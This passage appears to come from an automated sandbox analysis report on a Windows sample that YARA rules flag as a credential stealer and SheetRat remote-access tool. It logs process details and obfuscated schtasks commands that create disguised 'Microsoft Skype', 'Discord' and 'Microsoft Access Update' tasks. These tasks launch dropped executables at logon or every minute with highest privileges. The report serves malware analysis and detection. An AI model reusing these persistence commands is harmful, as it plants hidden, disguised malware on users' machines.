Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Source: 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Source: 00000000.00000002.3672605336.0000000012BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	02:25:07
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6a09e0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	02:25:07
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	02:25:07
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	02:25:07
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe"
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	02:25:30
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	02:25:30
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	02:25:30
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	12
Start time:	02:25:30
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	02:25:30
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	02:25:30
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	15
Start time:	02:25:32
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
Imagebase:	0x7c0000
File size:	785'404'928 bytes
MD5 hash:	D9E10C024C63855DC6ABCED6584521E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	16
Start time:	02:25:33
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1044, Parent PID: 5188

General

Target ID:	17
Start time:	02:25:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	02:25:33
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	02:25:34
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8068, Parent PID: 7040

General

Target ID:	20
Start time:	02:25:34
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	02:25:34
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	02:25:36
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7984, Parent PID: 7200

General

Target ID:	23
Start time:	02:25:36
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	24
Start time:	02:25:36
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	02:25:38
Start date:	13/12/2024
Path:	C:\Users\Public\Pictures\xdwdUpdate.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Pictures\xdwdUpdate.exe"
Imagebase:	0x680000
File size:	738'219'008 bytes
MD5 hash:	33DA7ED1E2C973375F265DAAA763EA08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	02:25:39
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8088, Parent PID: 6464

General

Target ID:	27
Start time:	02:25:39
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	02:25:39
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	02:25:40
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4644, Parent PID: 3404

General

Target ID:	30
Start time:	02:25:40
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	02:25:40
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	02:25:43
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\xdwdpnsvr.exe"
Imagebase:	0xd0000
File size:	785'404'928 bytes
MD5 hash:	D9E10C024C63855DC6ABCED6584521E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	02:25:42
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7576, Parent PID: 7800

General

Target ID:	34
Start time:	02:25:42
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	02:25:42
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	02:25:43
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5532, Parent PID: 6088

General

Target ID:	37
Start time:	02:25:43
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	38
Start time:	02:25:43
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	39
Start time:	02:25:44
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	02:25:44
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	41
Start time:	02:25:44
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	scHTaSks /Run /I /TN "Microsoft Skype"
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	42
Start time:	02:25:46
Start date:	13/12/2024
Path:	C:\Users\Public\Pictures\xdwdUpdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Pictures\xdwdUpdate.exe
Imagebase:	0xf00000
File size:	738'219'008 bytes
MD5 hash:	33DA7ED1E2C973375F265DAAA763EA08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	02:25:45
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6340, Parent PID: 7176

General

Target ID:	44
Start time:	02:25:46
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	45
Start time:	02:25:46
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	46
Start time:	02:25:47
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8028, Parent PID: 7164

General

Target ID:	47
Start time:	02:25:47
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	48
Start time:	02:25:47
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	49
Start time:	02:25:49
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3624, Parent PID: 6616

General

Target ID:	50
Start time:	02:25:49
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	51
Start time:	02:25:49
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	52
Start time:	02:25:51
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\xdwdpnsvr.exe"
Imagebase:	0x460000
File size:	785'404'928 bytes
MD5 hash:	D9E10C024C63855DC6ABCED6584521E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	53
Start time:	02:25:50
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5796, Parent PID: 5164

General

Target ID:	54
Start time:	02:25:50
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	55
Start time:	02:25:50
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	56
Start time:	02:25:52
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5800, Parent PID: 7676

General

Target ID:	57
Start time:	02:25:52
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	58
Start time:	02:25:52
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	59
Start time:	02:25:52
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5400, Parent PID: 5448

General

Target ID:	60
Start time:	02:25:52
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	61
Start time:	02:25:52
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	scHTaSks /Run /I /TN "Microsoft Skype"
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	62
Start time:	02:25:54
Start date:	13/12/2024
Path:	C:\Users\Public\Pictures\xdwdUpdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Pictures\xdwdUpdate.exe
Imagebase:	0x520000
File size:	738'219'008 bytes
MD5 hash:	33DA7ED1E2C973375F265DAAA763EA08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	63
Start time:	02:25:55
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
